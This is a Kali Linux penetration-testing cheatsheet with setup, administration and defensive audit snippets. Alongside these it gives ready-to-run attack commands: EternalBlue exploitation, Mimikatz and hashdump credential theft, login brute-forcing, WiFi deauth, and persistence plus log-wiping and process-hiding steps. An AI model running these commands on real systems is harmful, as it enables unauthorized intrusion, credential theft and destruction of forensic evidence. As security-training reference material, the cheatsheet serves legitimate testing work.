Kali Linux Cheatsheet
Kali Linux is a Debian-based Linux distribution built specifically for digital forensics and penetration testing. It is developed and maintained by Offensive Security and ships with over 600 penetration-testing tools pre-installed, which makes it the platform for cybersecurity professionals, ethical hackers and security researchers worldwide.
Installation and Setup
Download and Installation
```bash
# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso

# Verify checksum
sha256sum kali-linux-2024.1-installer-amd64.iso

# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress

# Create bootable USB (Windows): use Rufus, Etcher, or Win32DiskImager
```
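Running `sha256sum` on its own only prints a digest; the download is trustworthy only if that digest matches the `SHA256SUMS` manifest that Kali publishes next to the ISO and signs with its archive key. The following is an added example, not part of the original cheatsheet: `check_against_manifest` does the offline comparison against a manifest file, and `verify_kali_iso` wraps the documented fetch-and-verify flow. The manifest name, detached `.gpg` signature and key URL are the ones Kali publishes; the release directory argument and the availability of `wget` and `gpg` locally are assumptions.

```bash
# Added example (not from the original cheatsheet): verify a downloaded ISO
# against the signed SHA256SUMS manifest instead of only printing its digest.

# check_against_manifest <manifest> <file>
# Compares the digest recorded for <file> in a SHA256SUMS-style manifest
# ("<hex>  <name>" or "<hex> *<name>" per line) with the digest computed
# locally. Works offline. Returns 0 on match, 1 on mismatch or when the
# file has no manifest entry (an unlisted file is not a verified file).
check_against_manifest() {
    local manifest="$1" file="$2" name expected actual
    name=$(basename "$file")
    expected=$(awk -v f="$name" '{ sub(/^\*/, "", $2) } $2 == f { print $1; exit }' "$manifest")
    if [ -z "$expected" ]; then
        echo "no manifest entry for $name" >&2
        return 1
    fi
    actual=$(sha256sum "$file" | awk '{ print $1 }')
    if [ "$expected" != "$actual" ]; then
        echo "MISMATCH: $name (expected $expected, got $actual)" >&2
        return 1
    fi
    echo "OK: $name"
}

# verify_kali_iso <release-dir> <iso>
# Network flow as documented by Kali: fetch the manifest and its detached
# signature from the release directory, import the Kali archive signing key,
# verify the signature, then check the ISO digest. Assumes wget and gpg.
verify_kali_iso() {
    local release="$1" iso="$2"
    local base="https://cdimage.kali.org/${release}"
    wget -q "${base}/SHA256SUMS" "${base}/SHA256SUMS.gpg" || return 1
    wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import || return 1
    gpg --verify SHA256SUMS.gpg SHA256SUMS || return 1
    check_against_manifest SHA256SUMS "$iso"
}

# Usage:
#   verify_kali_iso kali-2024.1 kali-linux-2024.1-installer-amd64.iso
```

A signature check on the manifest is what ties the digest to Kali rather than to whoever served the file; a digest that matches an unsigned manifest fetched over the same channel proves only that the download was not corrupted in transit.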
Virtual Machine Setup
```bash
# VMware recommended settings
#   RAM: 4GB minimum, 8GB recommended
#   Storage: 80GB minimum
#   Network: NAT or Bridged

# VirtualBox recommended settings
#   RAM: 4GB minimum, 8GB recommended
#   Storage: 80GB minimum, VDI format
#   Network: NAT or Bridged
#   Enable VT-x/AMD-V virtualization
```
Initial Configuration
```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install additional tools
sudo apt install -y kali-linux-large

# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username

# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh

# Configure firewall
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
```
Essential Tools and Commands
Information Gathering
```bash
# Nmap - Network scanning
nmap -sS -sV -O target_ip
nmap -sC -sV -oA scan_results target_ip
nmap --script vuln target_ip

# Masscan - Fast port scanner
masscan -p1-65535 target_ip --rate=1000

# Dmitry - Information gathering
dmitry -winsepo output.txt target.com

# theHarvester - Email and subdomain gathering
theHarvester -d target.com -l 500 -b google

# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create target_workspace
[recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web
```
Vulnerability Assessment
```bash
# OpenVAS - Vulnerability scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update

# Nikto - Web vulnerability scanner
nikto -h http://target.com
nikto -h http://target.com -o nikto_results.txt

# Dirb - Directory brute forcer
dirb http://target.com
dirb http://target.com /usr/share/dirb/wordlists/big.txt

# Gobuster - Directory/file brute forcer
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt

# WPScan - WordPress vulnerability scanner
wpscan --url http://target.com --enumerate u,p,t
wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt
```
Web Application Testing
```bash
# Burp Suite - Web application security testing
burpsuite &

# OWASP ZAP - Web application scanner
zaproxy &

# SQLmap - SQL injection testing
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

# Commix - Command injection testing
commix --url="http://target.com/page.php?id=1"

# XSSer - Cross-site scripting testing
xsser --url "http://target.com/search.php?q=XSS" --auto
```
Exploitation
```bash
# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Searchsploit - Exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py

# Social Engineering Toolkit
setoolkit
# Select from menu options for phishing, credential harvesting, etc.

# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel
```
Post-Exploitation
```bash
# Meterpreter commands (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\

# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client

# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
```
Password Attacks
```bash
# John the Ripper - Password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

# Hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt ftp://target_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"

# Medusa - Parallel login brute forcer
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp

# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
```
Wireless Security
```bash
# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
```
Digital Forensics
```bash
# Autopsy - Digital forensics platform
autopsy &

# Volatility - Memory analysis
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind

# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin

# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/

# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file
```
Reverse Engineering
```bash
# Ghidra - NSA reverse engineering tool
ghidra &

# Radare2 - Reverse engineering framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main

# GDB - GNU Debugger (set the breakpoint before starting the program)
gdb binary_file
(gdb) break main
(gdb) run
(gdb) continue
(gdb) info registers

# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file | grep -i password

# Hexdump - Hex viewer
hexdump -C binary_file | head -20
xxd binary_file | head -20
```
System Administration
Package Management
```bash
# Update package lists
sudo apt update

# Upgrade all packages
sudo apt upgrade -y

# Install specific tools
sudo apt install -y tool_name

# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10

# Search for packages
apt search keyword
apt show package_name

# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove
```
Service Management
```bash
# Systemctl commands
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name

# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql

# Check listening ports
netstat -tlnp
ss -tlnp
```
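Enabling SSH and the firewall (Initial Configuration) and starting services here raise the same question: which sockets are actually reachable from the network? The added example below, not part of the original cheatsheet, filters `ss -tlnp` output down to listeners bound to a wildcard address, which are exactly the ports the `ufw` rules have to account for. The sample `ss` output it ships with is constructed, and on a live host the process column is only filled in when `ss` runs as root.

```bash
# Added example (not from the original cheatsheet): list TCP listeners bound
# to every interface, as an audit step after enabling services and the firewall.

# Constructed sample of `ss -tlnp` output (not captured from a real host).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=612,fd=3))
LISTEN 0      4096   127.0.0.1:5432      0.0.0.0:*         users:(("postgres",pid=800,fd=5))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=612,fd=4))
LISTEN 0      511    *:80                *:*               users:(("apache2",pid=901,fd=4))'

# exposed_listeners: read `ss -tlnp` output on stdin and print the local
# address and owning process of every socket bound to a wildcard address
# (0.0.0.0, [::] or *). Loopback-only services are skipped: they are not
# reachable from the network and need no firewall rule. The header line is
# skipped (NR > 1); when the process column is absent (non-root), "-" is printed.
exposed_listeners() {
    awk 'NR > 1 && $4 ~ /^(0\.0\.0\.0|\[::\]|\*):[0-9]+$/ {
            proc = (NF >= 6) ? $6 : "-"
            print $4, proc
         }'
}

# exposed_listener_count: number of wildcard listeners in the input.
exposed_listener_count() {
    exposed_listeners | wc -l | tr -d ' '
}

# Live audit on the current host:
#   sudo ss -tlnp | exposed_listeners
# Against the constructed sample:
#   printf '%s\n' "$SAMPLE_SS" | exposed_listeners
```

Each line this prints should correspond either to an `ufw allow` rule you intended or to a service that should be bound to `127.0.0.1` instead; the PostgreSQL listener in the sample is the latter case and therefore does not appear.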
Network Configuration
```bash
# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down

# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
#   auto eth0
#   iface eth0 inet static
#       address 192.168.1.100
#       netmask 255.255.255.0
#       gateway 192.168.1.1

# DNS configuration
sudo nano /etc/resolv.conf
# Add:
#   nameserver 8.8.8.8
#   nameserver 8.8.4.4

# Restart networking
sudo systemctl restart networking
```
User Management
```bash
# Add user
sudo useradd -m -s /bin/bash username
sudo passwd username

# Add user to groups
sudo usermod -aG sudo username
sudo usermod -aG adm username

# Switch user
su - username
sudo -u username command

# View user information
id username
groups username
finger username

# Lock/unlock user
sudo usermod -L username
sudo usermod -U username
```
Advanced Techniques
Custom Tool Installation
```bash
# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install

# Python tools
pip3 install tool_name
pip3 install -r requirements.txt

# Go tools
go install github.com/tool/repository@latest

# Ruby gems
gem install tool_name

# Manual installation
wget https://example.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install
```
Environment Customization
```bash
# Bash aliases
nano ~/.bashrc

# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'

# Custom functions: extract any common archive type by its extension
function extract() {
    if [ -f "$1" ]; then
        case "$1" in
            *.tar.bz2) tar xjf "$1" ;;
            *.tar.gz)  tar xzf "$1" ;;
            *.bz2)     bunzip2 "$1" ;;
            *.rar)     unrar e "$1" ;;
            *.gz)      gunzip "$1" ;;
            *.tar)     tar xf "$1" ;;
            *.tbz2)    tar xjf "$1" ;;
            *.tgz)     tar xzf "$1" ;;
            *.zip)     unzip "$1" ;;
            *.Z)       uncompress "$1" ;;
            *.7z)      7z x "$1" ;;
            *)         echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}

# Source the changes
source ~/.bashrc
```
Automation Scripts
```bash
#!/bin/bash
# Basic reconnaissance script: Nmap, directory enumeration and Nikto against
# one target, with all output collected under results/<target>/
TARGET=$1
if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target>"
    exit 1
fi

echo "Starting reconnaissance on $TARGET"
mkdir -p "results/$TARGET"

# Nmap scan
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA "results/$TARGET/nmap_scan" "$TARGET"

# Directory enumeration
echo "Running directory enumeration..."
gobuster dir -u "http://$TARGET" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o "results/$TARGET/gobuster.txt"

# Nikto scan
echo "Running Nikto scan..."
nikto -h "http://$TARGET" -o "results/$TARGET/nikto.txt"

echo "Reconnaissance complete. Results saved in results/$TARGET/"
```
Persistence and Stealth
```bash
# SSH key persistence
ssh-keygen -t rsa -b 4096
ssh-copy-id user@target_ip

# Cron job persistence
crontab -e
# Add: @reboot /path/to/script.sh

# Service persistence
sudo nano /etc/systemd/system/custom.service
# Create service file for persistence

# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w

# Process hiding
nohup ./malicious_binary > /dev/null 2>&1 & disown
```
Troubleshooting
Common Issues
```bash
# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop

# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm

# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start

# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager
```
Performance Optimization
```bash
# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon

# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean

# Monitor resources
htop
iotop
nethogs
iftop

# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils
```
Security Best Practices
Operational Security
```bash
# Use VPN for testing
sudo openvpn config.ovpn

# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap target_ip

# Tor usage
sudo systemctl start tor
proxychains firefox

# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0

# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/
```
Legal and Ethical Considerations
```bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws

# Create engagement documentation
echo "Penetration Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: IP ranges, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```
Resources
- Kali Linux Official Documentation
- Offensive Security Training
- Kali Linux Tools